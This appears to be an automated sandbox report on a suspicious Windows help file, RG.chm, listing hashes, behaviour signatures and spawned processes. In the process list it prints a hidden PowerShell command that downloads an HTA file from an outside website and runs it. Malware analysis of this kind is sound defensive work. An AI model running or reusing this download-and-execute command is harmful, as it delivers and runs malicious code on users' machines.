Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
21-03-2023 10:42
Static task
static1
Behavioral task
behavioral1
Sample
RG.chm
Resource
win7-20230220-en
windows7-x64
5 signatures
150 seconds
General
-
Target
RG.chm
-
Size
190KB
-
MD5
9d9a0a119044c6a83d533a1941bb64c5
-
SHA1
279387ccf49c5f71c99f8b89b333be4a70f6cab6
-
SHA256
83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06
-
SHA512
31c4edbcff416df4cada81dbd1e3bdc752cb8a74c837787feba01d9e93e00970b15efac6bf70548b8ba1811cf7e7522bbd64cfe0572d5619759b8069b5b399b2
-
SSDEEP
3072:Xg4C8YLEo5xuIvDocDWjc/pgDXQgKpacezvRBDobwrArHMp1G6/AirUIKX6MA:XpYIW0UY8pTxp/mjmqArYRQIKX5A
Score
1/10
Malware Config
Signatures
-
Processes:
hh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 520 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1700 hh.exe 1700 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 1700 wrote to memory of 520 1700 hh.exe powershell.exe PID 1700 wrote to memory of 520 1700 hh.exe powershell.exe PID 1700 wrote to memory of 520 1700 hh.exe powershell.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RG.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden wget 'https://meubooking.com.br/2023/reservations.php?file=edce4301c8d01cf9b904be.html' -OutFile 'C:\Users\Public\win32.hta'; Start-Process 'C:\Users\Public\win32.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/520-80-0x000000001B4A0000-0x000000001B782000-memory.dmpFilesize
2.9MB
-
memory/520-81-0x0000000001D70000-0x0000000001D78000-memory.dmpFilesize
32KB
-
memory/520-82-0x00000000029B0000-0x0000000002A30000-memory.dmpFilesize
512KB
-
memory/520-83-0x00000000029B0000-0x0000000002A30000-memory.dmpFilesize
512KB
-
memory/520-84-0x00000000029B0000-0x0000000002A30000-memory.dmpFilesize
512KB
-
memory/520-85-0x00000000029BB000-0x00000000029F2000-memory.dmpFilesize
220KB
-
memory/1700-73-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmpFilesize
64KB